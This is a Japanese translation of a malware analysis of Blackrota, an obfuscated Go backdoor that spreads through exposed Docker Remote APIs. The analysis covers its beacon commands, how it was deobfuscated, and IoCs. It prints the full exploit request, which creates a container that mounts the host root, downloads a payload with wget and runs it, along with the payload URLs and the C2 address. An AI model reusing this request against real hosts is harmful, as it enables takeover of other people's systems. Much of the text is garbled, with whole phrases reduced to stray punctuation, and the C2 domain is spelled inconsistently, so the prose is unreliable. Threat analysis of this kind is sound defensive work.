Blackrota、Goで書かれた非常に難解なバックドア

これまでに見た中で最も難読化されたGoELFマルウェア。

序文

最近、Docker Remote APIの不正アクセスの脆弱性を悪用した、Goで記述された悪意のあるバックドアがAnglerfishHoneypotで検出されました。

C2ドメインがblackrota.gaであるため、Blackrotaと名付けました。

Blackrotaバックドアは現在、ELF形式のLinuxでのみ使用可能であり、x86 / x86-64アーキテクチャをサポートしています。

Blackrotaが構成されているとに基づいて編集geacon - CobaltStrikeと相互作用が損なわホストを制御するCobaltStrikeビーコンとして使用CobaltStrikeビーコン移動実装を、：

ただし、これは元のCobaltStrikeビーコンの主要な機能の一部の実装にすぎません。

• CMD_SHELL：シェルコマンドの実行、

  
  
  
  
  

• CMD_UPLOAD：ファイルをアップロードします

  
  
  
  
  

• CMDDOWNLOAD：特別なファイルをダウンロードします。

  
  
  
  
  

• CMD_FILE _ ROWSE：ファイルを表示します。

  
  
  
  
  

• CMD_CD：ディレクトリの変更、

  
  
  
  
  

• CMD_SLEEP：スリープ遅延時間を設定し、

  
  
  
  
  

• CMD_PWD: ,

  
  
  
  
  

• CMD_EXIT: .

  
  
  
  
  

geacon, Blackrota gobfuscate - . Gobfuscate - Go-, Go- :

• ;

  
  
  
  
  

• ;

  
  
  
  
  

• ;

  
  
  
  
  

• ;

  
  
  
  
  

• .

  
  
  
  
  

, gobfuscate XOR , XOR, .

Go . , , , , . , , , Go . , Go.

, Go : RTSI (Runtime Symbol Information) RTTI (Runtime Type Information) . , Go, , Go. Go . , RTSI RTTI , , .

Blackrota gobfuscate , "life-door" . , , . .

, Go, , - , . Blackrota - Go ELF , .

Blackrota

Blackrota API Docker. :

POST /v1.37/containers/create HTTP/1.1
Host: {target_host}:{target_port}
User-Agent: Docker-Client/19.03.7 (linux)
Content-Length: 1687
Content-Type: application/json

{"Env":[],"Cmd":["/bin/sh","-c","rm ./32 ; wget https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/32;chmod 777 32; nohup ./32 \u003c/dev/null \u003e/dev/null 2\u003e\u00261 \u0026"],"Image":"alpine","Volumes":{},"WorkingDir":"","HostConfig":{"Binds":["/:/mnt"]}
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

32/64 Blackrota URL :

https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/32
https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/64
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

Blackrota

, Blackrota Go. go_parser IDAPro, , Go1.15.3, GOROOT path "/usr/local/Cellar/ go/1.15.3/libexec". , , , , , , .

, ( )

/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/main.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/http.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/packet.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/commands.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/idkinfdjhbmgpdcnhdaa/sysinfo_linux.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/idkinfdjhbmgpdcnhdaa/meta.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/setting.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/req.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/resp.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/dump.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/pmdjfejhfmifhmelifpm/util.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/rsa.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/rand.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/aes.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/eepmoknkdieemfhjjjgl/config.go

      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

Blackrota

, , , , Blackrota .

:

:

, , , :

, , , Go , . , , , Blackrota geacon.

, Blackrota, :

1. geacon Blackrota, ,

   
   
   
   
   

2. idb2pat.py IDAPro (geacon.pat) geacon-,

   
   
   
   
   

3. sigmake Flair Tools geacon (geacon.sig),

   
   
   
   
   

4. geacon.sig Blackrota IDAPro, .

   
   
   
   
   

! , , , , geacon-, :

Blackrota

, , Go, Blackrota, geacon . , geacon.

, Blackrota XOR , , , . XOR. gobfuscate XOR , , , . XOR :

, , XOR XOR. , .

, Go, , , . - , @joakimkennedy, main:

main - :

- EKANS, , Blackrota:

BlackrotaおよびEKANSマルウェアで使用される難読化方法は、分解のための新しい呼び出し/問題を作成します。Go言語の人気が高まり、将来的にGoで作成されるマルウェアが増えるにつれ、何が起こるかを監視します。

IoC

MD5：

e56e4a586601a1130814060cb4bf449b
6e020db51665614f4a2fd84fb0f83778
9ca7acc98c17c6b67efdedb51560e1fa
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

C＆C：

blackrato.ga    165.227.199.214    ASN: 14061|DigitalOcean,_LLC
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

PS記事は著者の許可を得て公開されました。私の最初の翻訳は、理解して扱ってください。